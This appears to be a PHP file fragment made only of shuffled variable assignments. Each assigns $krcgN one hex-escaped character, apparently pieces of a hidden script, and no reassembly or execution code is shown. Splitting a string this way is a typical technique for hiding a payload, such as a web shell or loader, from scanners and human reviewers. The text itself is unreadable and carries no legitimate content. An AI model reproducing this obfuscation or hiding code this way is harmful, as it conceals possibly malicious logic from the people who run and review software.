$krcg723="\x6f";
$krcg1369="\x30";$krcg1174="\x7b";$krcg508="\x6f";$krcg441="\x2c";$krcg53="\x74";$krcg567="\x3d";
$krcg931="\x20";$krcg861="\x20";$krcg1608="\x74";$krcg372="\x74";$krcg386="\x31";$krcg792="\x29";
$krcg1587="\x20";$krcg1000="\x6e";$krcg472="\x0a";$krcg442="\x20";
$krcg1018="\x6f";
$krcg1536="\x6e";
$krcg368="\x73";$krcg680="\x25";$krcg156="\x79";
$krcg182="\x30";$krcg1374="\x20";
$krcg1634="\x24";$krcg290="\x63";$krcg138="\x73";$krcg436="\x61";$krcg581="\x65";$krcg757="\x22";$krcg1680="\x0a";
$krcg28="\x69";$krcg106="\x73";
$krcg483="\x20";$krcg837="\x22";$krcg318="\x20";$krcg1511="\x65";$krcg346="\x24";$krcg119="\x6c";$krcg1692="\x24";$krcg1197="\x20";$krcg1211="\x20";$krcg1642="\x65";
$krcg1251="\x24";$krcg1069="\x6e";$krcg1025="\x22";$krcg1505="\x63";$krcg272="\x74";$krcg602="\x79";$krcg1704="\x0a";$krcg1612="\x63";
$krcg279="\x72";
$krcg1215="\x24";$krcg71="\x73";
$krcg1696="\x65";$krcg817="\x29";$krcg1015="\x24";$krcg1203="\x3b";
$krcg203="\x40";$krcg180="\x3d";$krcg298="\x20";$krcg1150="\x72";$krcg1022="\x2e";$krcg1080="\x72";
$krcg895="\x6f";
$krcg1635="\x76";$krcg1276="\x32";
$krcg655="\x09";$krcg576="\x72";$krcg178="\x69";$krcg799="\x09";$krcg1398="\x20";$krcg179="\x20";
$krcg1298="\x72";$krcg980="\x24";
$krcg411="\x09";$krcg291="\x68";$krcg49="\x65";$krcg884="\x24";$krcg1209="\x78";$krcg1324="\x28";$krcg960="\x32";
$krcg1383="\x24";$krcg1431="\x29";$krcg901="\x20";
$krcg1451="\x6e";
$krcg1212="\x69";$krcg85="\x31";$krcg1519="\x72";$krcg823="\x6e";$krcg1237="\x6a";
$krcg1376="\x20";
$krcg1102="\x20";$krcg1454="\x0a";$krcg1384="\x69";$krcg831="\x64";
$krcg486="\x20";
$krcg620="\x72";$krcg33="\x6e";$krcg570="\x3b";
$krcg96="\x20";$krcg770="\x69";$krcg1579="\x3a";$krcg235="\x2a";$krcg735="\x24";$krcg1281="\x20";$krcg592="\x72";$krcg1576="\x61";$krcg490="\x20";
$krcg181="\x20";$krcg210="\x73";$krcg1549="\x73";$krcg16="\x6c";$krcg1206="\x09";$krcg448="\x74";$krcg1478="\x63";$krcg451="\x63";$krcg1472="\x72";$krcg1322="\x6e";$krcg130="\x76";
$krcg1084="\x72";$krcg563="\x09";$krcg1307="\x6e";$krcg401="\x65";$krcg47="\x20";$krcg1678="\x4f";$krcg359="\x40";
$krcg1201="\x29";$krcg625="\x20";$krcg624="\x69";$krcg375="\x24";$krcg15="\x72";$krcg1224="\x0a";
$krcg938="\x22";$krcg1055="\x20";$krcg1168="\x2d";$krcg1194="\x28";
$krcg1078="\x0a";$krcg1088="\x6d";$krcg925="\x24";$krcg802="\x63";
$krcg1529="\x20";
$krcg977="\x7d";
$krcg1120="\x66";$krcg811="\x20";$krcg7="\x70";$krcg1455="\x7d";$krcg1503="\x23";$krcg663="\x20";$krcg1345="\x69";$krcg815="\x6c";$krcg63="\x65";$krcg168="\x69";
$krcg755="\x5c";$krcg1518="\x65";$krcg340="\x65";$krcg211="\x20";$krcg1651="\x74";$krcg1711="\x6e";$krcg529="\x65";
$krcg1318="\x20";
$krcg3="\x6f";$krcg754="\x22";$krcg1110="\x79";$krcg1652="\x69";
$krcg807="\x6c";
$krcg704="\x61";$krcg310="\x09";$krcg1058="\x76";
$krcg1252="\x69";$krcg1126="\x09";$krcg225="\x28";$krcg1241="\x20";$krcg559="\x29";$krcg86="\x20";$krcg1442="\x75";$krcg4="\x72";$krcg301="\x65";$krcg580="\x6d";$krcg519="\x66";$krcg1239="\x20";
$krcg1554="\x23";$krcg365="\x74";
$krcg578="\x6e";$krcg778="\x28";
$krcg99="\x6c";$krcg1028="\x63";$krcg1603="\x0a";$krcg552="\x69";
$krcg43="\x32";$krcg1468="\x72";$krcg1016="\x6d";$krcg957="\x6e";$krcg140="\x62";$krcg381="\x20";$krcg1515="\x67";$krcg363="\x69";
$krcg882="\x2b";$krcg1227="\x40";$krcg634="\x3c";$krcg1332="\x29";$krcg1052="\x20";$krcg912="\x6d";$krcg1627="\x61";$krcg1253="\x5d";
$krcg827="\x24";$krcg1071="\x6d";$krcg1386="\x20";$krcg126="\x73";$krcg1306="\x69";$krcg266="\x61";
$krcg394="\x73";$krcg999="\x5f";$krcg1448="\x74";$krcg828="\x6d";$krcg1296="\x62";$krcg353="\x09";$krcg1121="\x6c";
$krcg1236="\x24";$krcg553="\x6e";$krcg1282="\x24";$krcg708="\x20";$krcg653="\x7b";$krcg1495="\x6e";$krcg412="\x7d";
$krcg500="\x6f";$krcg668="\x70";$krcg953="\x74";$krcg1463="\x73";$krcg628="\x30";$krcg1178="\x6d";$krcg728="\x73";$krcg826="\x09";$krcg1434="\x0a";$krcg888="\x7b";$krcg1410="\x22";$krcg105="\x74";$krcg23="\x6d";$krcg65="\x0a";$krcg676="\x5c";$krcg1510="\x74";$krcg1659="\x70";$krcg1233="\x69";$krcg950="\x28";$krcg1618="\x6e";$krcg696="\x2c";$krcg243="\x74";$krcg1610="\x24";$krcg1196="\x69";$krcg240="\x65";$krcg102="\x69";$krcg1002="\x6d";$krcg859="\x24";$krcg1032="\x76";$krcg190="\x73";
$krcg1432="\x29";$krcg627="\x20";$krcg1163="\x61";$krcg557="\x65";$krcg1509="\x75";
$krcg545="\x69";$krcg1106="\x68";$krcg988="\x3d";$krcg494="\x75";
$krcg79="\x61";$krcg743="\x09";$krcg1230="\x31";$krcg362="\x72";$krcg1626="\x74";
$krcg779="\x32";$krcg937="\x6e";
$krcg1297="\x20";$krcg1564="\x6e";$krcg750="\x20";$krcg392="\x70";
$krcg62="\x6d";$krcg865="\x3b";$krcg972="\x30";$krcg813="\x76";$krcg621="\x20";$krcg753="\x20";$krcg1061="\x20";
$krcg1062="\x5c";$krcg994="\x2e";$krcg1552="\x65";$krcg376="\x63";$krcg1113="\x65";
$krcg1596="\x68";$krcg748="\x64";$krcg1119="\x66";$krcg930="\x65";$krcg285="\x73";$krcg29="\x6e";$krcg1085="\x6e";$krcg1674="\x6f";$krcg454="\x6f";$krcg267="\x79";$krcg1099="\x73";$krcg919="\x2e";$krcg614="\x22";
$krcg1125="\x0a";
$krcg6="\x2d";$krcg50="\x62";$krcg1541="\x68";
$krcg66="\x23";$krcg511="\x20";$krcg248="\x3b";$krcg169="\x66";$krcg616="\x0a";$krcg1679="\x3b";$krcg1185="\x20";$krcg1351="\x22";$krcg80="\x74";
$krcg361="\x63";$krcg996="\x76";$krcg27="\x68";$krcg1208="\x65";$krcg1705="\x65";$krcg1180="\x20";$krcg1004="\x2e";$krcg1657="\x3b";$krcg951="\x69";$krcg745="\x6d";$krcg1264="\x69";$krcg1496="\x6c";$krcg677="\x24";$krcg68="\x63";$krcg121="\x20";$krcg101="\x72";$krcg1676="\x65";$krcg260="\x61";$krcg1491="\x6f";
$krcg1499="\x63";$krcg1183="\x20";$krcg1567="\x65";$krcg694="\x3b";$krcg941="\x66";$krcg268="\x20";$krcg794="\x0a";$krcg258="\x64";$krcg51="\x61";$krcg1077="\x09";
$krcg667="\x73";$krcg407="\x24";$krcg872="\x24";$krcg434="\x74";
$krcg929="\x64";$krcg685="\x5c";$krcg1368="\x20";$krcg157="\x20";$krcg1689="\x0a";$krcg524="\x72";$krcg26="\x70";
$krcg261="\x6e";$krcg430="\x63";$krcg586="\x61";$krcg832="\x65";$krcg1594="\x72";$krcg560="\x3b";$krcg1629="\x6f";$krcg982="\x63";
$krcg1691="\x2b";$krcg264="\x72";$krcg1538="\x65";$krcg429="\x73";
$krcg305="\x72";$krcg242="\x61";
$krcg1411="\x25";$krcg1598="\x24";$krcg1625="\x65";$krcg19="\x6f";
$krcg954="\x28";$krcg206="\x64";$krcg889="\x0a";$krcg1379="\x3b";$krcg230="\x28";$krcg1187="\x6e";$krcg1035="\x5f";$krcg464="\x73";$krcg1191="\x61";
$krcg835="\x3d";$krcg997="\x61";
$krcg1133="\x31";$krcg1199="\x20";$krcg485="\x65";
$krcg422="\x64";$krcg438="\x72";$krcg288="\x68";$krcg902="\x22";$krcg402="\x78";$krcg672="\x74";$krcg840="\x24";$krcg1412="\x63";$krcg758="\x20";$krcg965="\x29";$krcg389="\x0a";$krcg257="\x6c";
$krcg1666="\x20";
$krcg5="\x65";$krcg366="\x2c";
$krcg1275="\x61";
$krcg1290="\x7d";$krcg133="\x73";$krcg1095="\x7d";$krcg332="\x67";$krcg914="\x22";$krcg1416="\x69";$krcg983="\x6f";$krcg208="\x78";
$krcg347="\x69";$krcg107="\x20";$krcg256="\x69";$krcg1190="\x72";$krcg1024="\x20";$krcg874="\x73";$krcg110="\x73";$krcg1498="\x20";$krcg1669="\x63";$krcg1195="\x24";$krcg1365="\x69";$krcg1547="\x65";$krcg420="\x61";
$krcg527="\x61";
$krcg471="\x64";$krcg153="\x0a";$krcg574="\x76";$krcg1193="\x64";
$krcg1320="\x20";$krcg1565="\x67";$krcg1295="\x75";$krcg976="\x09";$krcg656="\x09";$krcg200="\x29";$krcg575="\x61";$krcg600="\x09";$krcg1093="\x3b";
$krcg223="\x6e";
$krcg1473="\x73";$krcg480="\x20";$krcg501="\x72";$krcg1128="\x79";$krcg1479="\x6f";$krcg1381="\x2b";$krcg703="\x6e";$krcg1445="\x20";$krcg893="\x6d";
$krcg878="\x70";$krcg331="\x6e";$krcg1497="\x79";$krcg487="\x63";$krcg729="\x63";
$krcg989="\x20";$krcg819="\x73";$krcg1407="\x74";
$krcg1176="\x09";$krcg1043="\x3b";
$krcg343="\x20";
$krcg549="\x20";$krcg1348="\x20";$krcg373="\x72";$krcg1500="\x61";
$krcg1003="\x65";$krcg1641="\x6d";
$krcg808="\x61";$krcg1648="\x65";$krcg1559="\x67";
$krcg1584="\x63";$krcg219="\x09";$krcg1664="\x20";
$krcg585="\x72";$krcg909="\x5f";
$krcg320="\x20";
$krcg795="\x09";$krcg772="\x74";$krcg37="\x65";$krcg78="\x72";$krcg378="\x64";$krcg1690="\x2b";$krcg834="\x2e";$krcg1064="\x24";$krcg374="\x28";$krcg1310="\x7b";$krcg1447="\x73";$krcg790="\x20";$krcg700="\x61";
$krcg10="\x72";$krcg355="\x75";
$krcg297="\x64";$krcg1354="\x0a";
$krcg727="\x24";$krcg325="\x69";
$krcg1462="\x69";$krcg935="\x22";$krcg796="\x7d";$krcg1663="\x74";$krcg158="\x24";$krcg858="\x28";
$krcg670="\x69";$krcg516="\x72";$krcg775="\x61";$krcg55="\x61";$krcg93="\x6e";$krcg947="\x20";$krcg1449="\x72";$krcg1687="\x22";
$krcg335="\x28";$krcg1145="\x3b";
$krcg883="\x2b";$krcg869="\x20";
$krcg854="\x66";$krcg1001="\x61";
$krcg822="\x69";
$krcg1177="\x09";$krcg1116="\x73";$krcg1147="\x09";$krcg1189="\x28";$krcg329="\x6c";
$krcg654="\x0a";$krcg1601="\x29";$krcg619="\x6f";$krcg207="\x65";$krcg674="\x28";$krcg467="\x66";$krcg418="\x20";$krcg1389="\x09";$krcg513="\x61";$krcg405="\x2c";$krcg1300="\x6e";$krcg1019="\x64";
$krcg17="\x20";$krcg569="\x30";$krcg1438="\x09";$krcg1373="\x69";$krcg1486="\x61";$krcg829="\x63";
$krcg1458="\x23";$krcg163="\x20";$krcg1490="\x79";$krcg309="\x0a";$krcg1101="\x62";$krcg1572="\x65";
$krcg781="\x29";$krcg1283="\x69";$krcg769="\x28";$krcg746="\x63";$krcg867="\x24";
$krcg1287="\x09";$krcg507="\x63";$krcg547="\x74";$krcg491="\x72";$krcg414="\x0a";
$krcg1261="\x32";$krcg196="\x20";
$krcg1076="\x0a";
$krcg701="\x72";$krcg313="\x72";
$krcg1688="\x3b";$krcg425="\x69";$krcg81="\x69";$krcg1672="\x63";$krcg1535="\x69";$krcg1482="\x2c";
$krcg768="\x20";$krcg617="\x09";$krcg1301="\x64";
$krcg64="\x72";$krcg538="\x65";$krcg1213="\x66";$krcg449="\x72";$krcg1291="\x0a";$krcg706="\x65";
$krcg205="\x6e";$krcg100="\x20";$krcg917="\x24";$krcg209="\x65";
$krcg1265="\x2c";
$krcg974="\x3b";
$krcg1560="\x72";$krcg741="\x0a";$krcg1186="\x69";$krcg1135="\x20";$krcg846="\x61";$krcg1042="\x22";
$krcg1089="\x63";
$krcg367="\x20";$krcg1452="\x67";$krcg146="\x6d";$krcg1358="\x72";$krcg468="\x66";
$krcg132="\x72";$krcg798="\x0a";$krcg204="\x69";$krcg1439="\x72";$krcg201="\x2c";$krcg1527="\x6f";
$krcg984="\x64";$krcg435="\x20";
$krcg2="\x6d";$krcg1325="\x72";
$krcg322="\x3b";$krcg452="\x6b";$krcg1485="\x65";$krcg1706="\x76";$krcg1600="\x63";
$krcg342="\x3b";$krcg512="\x6c";
$krcg1235="\x20";
$krcg539="\x28";$krcg1327="\x6e";$krcg702="\x5f";$krcg558="\x73";$krcg274="\x65";$krcg650="\x69";$krcg589="\x5f";$krcg92="\x6f";
$krcg75="\x65";$krcg1585="\x20";
$krcg1537="\x63";$krcg1390="\x09";$krcg640="\x63";$krcg752="\x3d";$krcg499="\x63";$krcg688="\x25";$krcg1033="\x61";$krcg20="\x64";
$krcg186="\x6d";$krcg246="\x6e";$krcg1423="\x64";$krcg45="\x30";$krcg1607="\x6e";$krcg603="\x20";
$krcg913="\x65";$krcg437="\x72";$krcg911="\x61";$krcg945="\x24";
$krcg776="\x6e";$krcg962="\x29";$krcg1429="\x39";$krcg958="\x64";$krcg11="\x6c";$krcg427="\x65";$krcg987="\x2e";$krcg349="\x20";$krcg847="\x6d";$krcg641="\x72";$krcg1202="\x29";$krcg1400="\x3d";$krcg565="\x69";$krcg1405="\x69";$krcg154="\x09";$krcg289="\x69";$krcg166="\x73";$krcg1134="\x2c";$krcg1226="\x09";$krcg1046="\x24";
$krcg801="\x20";$krcg234="\x24";$krcg90="\x73";
$krcg124="\x66";
$krcg1644="\x24";$krcg833="\x20";$krcg432="\x69";$krcg1646="\x65";$krcg542="\x73";
$krcg1269="\x5d";$krcg505="\x74";$krcg1715="\x0a";
$krcg1670="\x3b";$krcg1278="\x24";$krcg232="\x25";$krcg1326="\x61";$krcg886="\x29";$krcg1305="\x72";$krcg607="\x6f";$krcg308="\x74";$krcg725="\x64";$krcg1475="\x76";$krcg1330="\x33";$krcg1364="\x24";$krcg517="\x0a";$krcg611="\x3d";$krcg993="\x22";$krcg123="\x65";$krcg690="\x32";$krcg413="\x0a";
$krcg1569="\x70";$krcg185="\x09";$krcg906="\x76";$krcg193="\x69";$krcg630="\x20";$krcg966="\x29";$krcg1356="\x66";$krcg275="\x20";$krcg985="\x65";
$krcg1156="\x24";$krcg612="\x20";
$krcg1248="\x6a";$krcg1243="\x24";$krcg1204="\x0a";$krcg583="\x3d";$krcg875="\x63";
$krcg899="\x2e";$krcg763="\x28";
$krcg531="\x5f";$krcg934="\x20";
$krcg1026="\x5c";$krcg1131="\x24";$krcg551="\x40";$krcg212="\x3d";$krcg98="\x6c";$krcg195="\x74";$krcg1556="\x69";$krcg896="\x64";$krcg986="\x20";$krcg1426="\x30";
$krcg1461="\x68";$krcg1623="\x3e";
$krcg350="\x7b";$krcg60="\x61";
$krcg1289="\x0a";$krcg530="\x73";
$krcg1640="\x61";$krcg484="\x77";$krcg514="\x74";$krcg1533="\x20";
$krcg1675="\x73";$krcg699="\x76";$krcg990="\x22";$krcg924="\x09";$krcg1459="\x20";$krcg1157="\x69";$krcg131="\x65";$krcg95="\x23";
$krcg1158="\x20";
$krcg843="\x72";
$krcg214="\x28";$krcg1049="\x6f";$krcg747="\x6f";$krcg591="\x74";
$krcg1047="\x6d";
$krcg1401="\x20";
$krcg1639="\x6e";$krcg543="\x63";$krcg312="\x6f";$krcg1070="\x61";$krcg1504="\x20";$krcg613="\x22";$krcg1271="\x3d";$krcg1122="\x65";$krcg1557="\x73";$krcg783="\x31";$krcg1415="\x20";$krcg109="\x65";
$krcg658="\x6d";$krcg245="\x6f";$krcg1311="\x0a";
$krcg805="\x63";
$krcg643="\x70";$krcg1039="\x65";$krcg868="\x69";$krcg439="\x61";$krcg626="\x3d";$krcg506="\x20";$krcg1352="\x22";$krcg523="\x65";$krcg1246="\x5b";$krcg251="\x09";$krcg385="\x20";$krcg113="\x76";$krcg726="\x28";$krcg1048="\x63";
$krcg732="\x70";$krcg785="\x29";$krcg631="\x24";$krcg787="\x20";$krcg1232="\x24";$krcg475="\x20";$krcg406="\x20";$krcg629="\x3b";$krcg184="\x0a";$krcg194="\x70";
$krcg1570="\x6f";$krcg595="\x67";$krcg818="\x20";$krcg1397="\x67";$krcg423="\x6f";$krcg377="\x6f";$krcg928="\x6f";$krcg678="\x25";$krcg1041="\x3b";$krcg623="\x24";$krcg731="\x69";
$krcg371="\x73";$krcg1710="\x24";$krcg147="\x6f";$krcg1609="\x20";$krcg594="\x6e";$krcg955="\x72";$krcg1268="\x6a";$krcg520="\x69";$krcg638="\x23";
$krcg521="\x73";$krcg970="\x3d";$krcg1063="\x24";$krcg1699="\x74";$krcg1539="\x20";$krcg1645="\x67";
$krcg433="\x70";$krcg278="\x61";$krcg1075="\x3b";$krcg250="\x0a";
$krcg155="\x6d";$krcg1528="\x72";$krcg848="\x65";$krcg1382="\x2b";$krcg478="\x65";$krcg1329="\x28";$krcg247="\x29";$krcg744="\x24";$krcg473="\x09";$krcg48="\x53";$krcg253="\x20";$krcg1474="\x69";$krcg59="\x72";$krcg1308="\x67";$krcg1671="\x0a";$krcg718="\x24";$krcg1257="\x09";$krcg1179="\x79";$krcg241="\x72";$krcg1012="\x0a";$krcg1464="\x20";
$krcg1571="\x6e";
$krcg94="\x0a";$krcg784="\x29";$krcg144="\x74";$krcg1532="\x2c";$krcg1021="\x20";
$krcg942="\x20";$krcg1142="\x20";$krcg871="\x20";
$krcg766="\x20";$krcg908="\x72";$krcg469="\x6c";$krcg969="\x3d";$krcg610="\x20";
$krcg104="\x68";$krcg1103="\x66";$krcg963="\x2b";
$krcg160="\x6f";$krcg803="\x61";$krcg326="\x20";$krcg300="\x68";
$krcg738="\x29";$krcg1317="\x6c";$krcg1065="\x76";$krcg236="\x24";
$krcg825="\x0a";$krcg165="\x20";$krcg1404="\x72";$krcg1073="\x3b";$krcg1285="\x3b";$krcg30="\x67";$krcg35="\x69";$krcg1228="\x24";
$krcg1314="\x79";
$krcg1051="\x65";$krcg1561="\x6f";$krcg1599="\x24";$krcg714="\x78";$krcg1361="\x6d";
$krcg356="\x73";$krcg399="\x6e";$krcg1637="\x72";$krcg1632="\x68";$krcg1512="\x20";$krcg562="\x0a";$krcg149="\x70";$krcg561="\x0a";$krcg1542="\x65";$krcg14="\x65";$krcg1335="\x3b";$krcg856="\x72";
$krcg1175="\x0a";$krcg717="\x5b";$krcg460="\x20";$krcg387="\x29";$krcg150="\x68";$krcg742="\x09";$krcg384="\x2c";$krcg1562="\x77";$krcg1096="\x0a";
$krcg161="\x64";$krcg213="\x20";$krcg1681="\x24";$krcg410="\x0a";$krcg294="\x75";
$krcg971="\x20";$krcg284="\x72";$krcg1090="\x6f";$krcg1072="\x65";
$krcg1143="\x40";
$krcg58="\x4b";$krcg1309="\x0a";$krcg579="\x61";$krcg443="\x6b";$krcg1218="\x3d";$krcg1266="\x20";$krcg786="\x29";$krcg1481="\x65";$krcg633="\x20";$krcg1543="\x20";$krcg673="\x66";$krcg724="\x72";$krcg282="\x74";$krcg541="\x40";$krcg462="\x65";$krcg492="\x65";$krcg1622="\x22";$krcg396="\x20";$krcg645="\x3b";$krcg648="\x2b";$krcg344="\x2b";$krcg495="\x69";$krcg1493="\x20";$krcg135="\x64";$krcg162="\x65";$krcg202="\x20";$krcg408="\x69";$krcg364="\x70";$krcg730="\x72";
$krcg416="\x09";$krcg597="\x29";$krcg1216="\x69";$krcg1263="\x24";$krcg904="\x24";$krcg348="\x29";$krcg1677="\x20";
$krcg199="\x28";$krcg1153="\x6d";$krcg1441="\x74";
$krcg136="\x2e";$krcg910="\x6e";$krcg1636="\x61";$krcg224="\x64";$krcg1260="\x61";$krcg921="\x3b";$krcg76="\x6e";$krcg1182="\x6a";$krcg820="\x74";$krcg923="\x09";
$krcg1105="\x73";$krcg1619="\x28";
$krcg844="\x5f";$krcg905="\x24";$krcg479="\x6d";$krcg188="\x20";$krcg1161="\x40";$krcg1036="\x6e";
$krcg379="\x65";$krcg164="\x3d";$krcg1413="\x22";$krcg1581="\x0a";$krcg956="\x61";$krcg1321="\x69";$krcg1682="\x63";$krcg1437="\x0a";$krcg535="\x66";$krcg1347="\x67";$krcg1605="\x72";$krcg303="\x73";$krcg1159="\x3d";$krcg1508="\x70";
$krcg1530="\x73";$krcg197="\x3d";
$krcg1650="\x61";$krcg1403="\x70";$krcg749="\x65";$krcg1059="\x61";$krcg939="\x20";$krcg1244="\x61";
$krcg129="\x65";$krcg1053="\x2e";$krcg252="\x23";$krcg920="\x22";
$krcg286="\x20";$krcg891="\x09";$krcg493="\x62";$krcg108="\x72";$krcg1294="\x73";$krcg898="\x20";$krcg170="\x74";$krcg1387="\x7b";$krcg568="\x20";$krcg174="\x6d";$krcg1165="\x3b";$krcg1044="\x0a";$krcg134="\x65";$krcg644="\x74";$krcg788="\x3d";$krcg684="\x22";
$krcg328="\x20";
$krcg91="\x69";
$krcg152="\x7b";$krcg1418="\x74";$krcg863="\x20";$krcg1588="\x6d";$krcg1219="\x3d";$krcg1563="\x69";
$krcg810="\x65";$krcg509="\x64";$krcg457="\x68";
$krcg1109="\x5f";$krcg635="\x3d";$krcg1344="\x72";
$krcg383="\x69";$krcg1254="\x3b";
$krcg555="\x65";$krcg1171="\x3b";$krcg1522="\x69";$krcg1548="\x2d";$krcg720="\x5d";$krcg604="\x24";$krcg1480="\x64";$krcg590="\x73";$krcg447="\x20";$krcg662="\x65";
$krcg1673="\x6c";$krcg1380="\x20";$krcg276="\x63";$krcg1370="\x3b";$krcg1184="\x3d";$krcg388="\x3b";$krcg877="\x69";$krcg1141="\x3d";
$krcg1273="\x40";$krcg1123="\x0a";$krcg1331="\x29";$krcg262="\x20";$krcg1144="\x5f";$krcg642="\x69";$krcg1395="\x69";$krcg1575="\x69";$krcg341="\x29";$krcg881="\x20";$krcg793="\x3b";$krcg228="\x6d";$krcg1514="\x20";$krcg336="\x24";$krcg403="\x65";$krcg1589="\x65";$krcg357="\x68";$krcg1399="\x2e";$krcg601="\x6d";$krcg38="\x20";$krcg1616="\x70";$krcg1707="\x61";
$krcg233="\x24";
$krcg465="\x68";$krcg791="\x30";
$krcg967="\x29";
$krcg830="\x6f";$krcg804="\x6c";
$krcg1293="\x0a";$krcg1551="\x7a";$krcg488="\x61";
$krcg1192="\x6e";$krcg172="\x0a";$krcg584="\x20";$krcg1595="\x70";$krcg948="\x25";$krcg306="\x69";
$krcg692="\x5c";
$krcg77="\x65";$krcg1277="\x5b";$krcg608="\x64";$krcg39="\x28";$krcg1377="\x24";$krcg42="\x20";$krcg821="\x72";$krcg1591="\x61";$krcg664="\x2e";$krcg1433="\x3b";$krcg1274="\x24";$krcg125="\x74";$krcg151="\x0a";$krcg1614="\x0a";
$krcg1450="\x69";$krcg409="\x3b";
$krcg540="\x5c";$krcg1054="\x3d";$krcg1453="\x3b";$krcg533="\x68";$krcg1136="\x24";$krcg1470="\x63";$krcg415="\x0a";
$krcg445="\x65";$krcg323="\x20";$krcg842="\x61";$krcg1506="\x6f";$krcg1467="\x20";$krcg892="\x24";$krcg292="\x20";$krcg773="\x28";$krcg380="\x2c";
$krcg382="\x24";
$krcg1316="\x24";$krcg351="\x0a";$krcg1140="\x20";$krcg1422="\x6e";$krcg992="\x24";$krcg72="\x74";$krcg1360="\x28";
$krcg1577="\x6c";$krcg712="\x64";$krcg737="\x5d";$krcg1336="\x0a";
$krcg183="\x3b";$krcg651="\x29";$krcg532="\x73";$krcg345="\x2b";
$krcg1402="\x73";$krcg1229="\x61";$krcg1428="\x2b";$krcg277="\x68";$krcg873="\x23";
$krcg510="\x65";
$krcg733="\x74";$krcg321="\x30";$krcg1137="\x61";$krcg417="\x23";$krcg358="\x20";$krcg1010="\x22";$krcg244="\x69";$krcg981="\x6d";$krcg943="\x28";$krcg1250="\x20";$krcg1624="\x6d";$krcg1525="\x73";$krcg693="\x22";$krcg191="\x63";$krcg1593="\x6f";$krcg1394="\x72";$krcg117="\x20";$krcg1129="\x20";$krcg973="\x29";$krcg444="\x65";$krcg1279="\x6a";$krcg1695="\x6e";$krcg978="\x0a";$krcg855="\x6f";
$krcg566="\x20";$krcg632="\x69";
$krcg975="\x0a";$krcg192="\x72";$krcg88="\x65";
$krcg1346="\x6e";
$krcg968="\x20";
$krcg879="\x74";$krcg864="\x30";
$krcg1417="\x6e";$krcg952="\x6e";$krcg1339="\x79";$krcg97="\x41";
$krcg711="\x6e";
$krcg1138="\x32";$krcg1708="\x6c";$krcg482="\x6f";$krcg1484="\x6d";$krcg665="\x3d";$krcg897="\x65";
$krcg393="\x75";$krcg338="\x6f";$krcg440="\x79";$krcg1107="\x65";$krcg789="\x3d";$krcg333="\x74";$krcg1152="\x28";
$krcg797="\x0a";$krcg734="\x5b";$krcg1198="\x2b";
$krcg1580="\x29";$krcg1694="\x65";$krcg287="\x77";$krcg1713="\x3b";
$krcg1349="\x3d";$krcg1115="\x5f";$krcg21="\x65";$krcg1006="\x69";$krcg780="\x30";$krcg995="\x24";
$krcg907="\x61";$krcg337="\x63";$krcg1419="\x28";$krcg1104="\x69";$krcg1098="\x0a";$krcg327="\x3c";$krcg573="\x24";$krcg1262="\x5b";$krcg1385="\x29";$krcg777="\x64";$krcg1292="\x0a";$krcg1124="\x7b";$krcg22="\x20";$krcg1359="\x20";$krcg497="\x64";$krcg459="\x77";
$krcg1114="\x73";$krcg1286="\x0a";$krcg1092="\x65";
$krcg1210="\x74";
$krcg1424="\x28";$krcg739="\x29";
$krcg721="\x2c";$krcg1701="\x6f";
$krcg652="\x20";$krcg518="\x09";
$krcg756="\x6e";$krcg127="\x20";$krcg598="\x3b";$krcg177="\x24";
$krcg1031="\x24";$krcg167="\x68";$krcg1319="\x3d";$krcg1146="\x0a";
$krcg54="\x69";$krcg474="\x23";$krcg1597="\x28";$krcg918="\x69";$krcg271="\x20";$krcg1371="\x20";$krcg431="\x72";$krcg1703="\x3b";$krcg1655="\x22";$krcg1471="\x75";$krcg1653="\x6f";$krcg876="\x72";$krcg1038="\x6d";$krcg550="\x5c";$krcg806="\x75";
$krcg116="\x2c";$krcg528="\x74";$krcg1436="\x7d";$krcg1066="\x61";$krcg145="\x61";$krcg657="\x24";$krcg1353="\x3b";$krcg1256="\x09";$krcg1249="\x2c";$krcg1656="\x29";$krcg890="\x09";
$krcg1534="\x73";$krcg1502="\x0a";$krcg839="\x24";$krcg1697="\x72";$krcg1631="\x70";$krcg120="\x6c";
$krcg1223="\x3b";$krcg647="\x2b";$krcg515="\x65";$krcg1425="\x32";$krcg227="\x69";$krcg836="\x20";$krcg273="\x68";$krcg1700="\x69";
$krcg1366="\x20";
$krcg710="\x69";$krcg1303="\x73";
$krcg715="\x65";$krcg36="\x6e";$krcg1166="\x20";
$krcg46="\x39";$krcg112="\x72";
$krcg1154="\x79";$krcg1357="\x6f";
$krcg1108="\x72";$krcg84="\x2d";$krcg1270="\x20";$krcg316="\x24";$krcg1160="\x20";$krcg1392="\x73";
$krcg476="\x74";$krcg159="\x63";$krcg304="\x63";$krcg265="\x72";$krcg637="\x24";$krcg1200="\x31";$krcg481="\x73";$krcg1083="\x75";$krcg1258="\x40";$krcg959="\x28";$krcg713="\x65";
$krcg1067="\x72";$krcg1367="\x3d";$krcg1234="\x2c";$krcg800="\x23";$krcg1550="\x69";
$krcg269="\x6f";$krcg57="\x20";$krcg1531="\x6f";$krcg470="\x65";
$krcg1037="\x61";$krcg1247="\x24";
$krcg466="\x75";$krcg1540="\x74";
$krcg1363="\x20";
$krcg198="\x20";$krcg1372="\x24";$krcg666="\x20";$krcg31="\x20";$krcg1045="\x09";
$krcg1164="\x31";
$krcg1005="\x24";
$krcg1288="\x7d";
$krcg1483="\x20";$krcg740="\x3b";$krcg296="\x6c";
$krcg1469="\x65";$krcg1323="\x74";
$krcg1456="\x0a";$krcg1094="\x0a";
$krcg1466="\x73";$krcg582="\x20";$krcg1117="\x68";$krcg1139="\x29";
$krcg812="\x65";$krcg87="\x76";$krcg698="\x24";$krcg814="\x61";$krcg456="\x20";
$krcg1606="\x69";
$krcg1443="\x72";$krcg679="\x73";$krcg1013="\x0a";$krcg998="\x72";$krcg189="\x40";
$krcg1214="\x20";
$krcg421="\x6e";
$krcg761="\x20";
$krcg1188="\x74";$krcg1334="\x32";
$krcg618="\x66";$krcg103="\x67";$krcg1523="\x6f";$krcg661="\x64";$krcg1566="\x20";$krcg751="\x2e";$krcg762="\x28";$krcg148="\x72";$krcg1245="\x31";
$krcg34="\x67";$krcg639="\x73";$krcg1578="\x20";$krcg1435="\x09";$krcg226="\x74";$krcg1205="\x09";$krcg24="\x6f";$krcg536="\x66";$krcg1017="\x63";$krcg534="\x75";$krcg458="\x6f";
$krcg765="\x69";$krcg572="\x09";$krcg596="\x28";$krcg1207="\x6e";$krcg1662="\x6e";
$krcg659="\x63";
$krcg395="\x68";$krcg1430="\x37";$krcg1220="\x20";$krcg1628="\x6d";$krcg293="\x62";
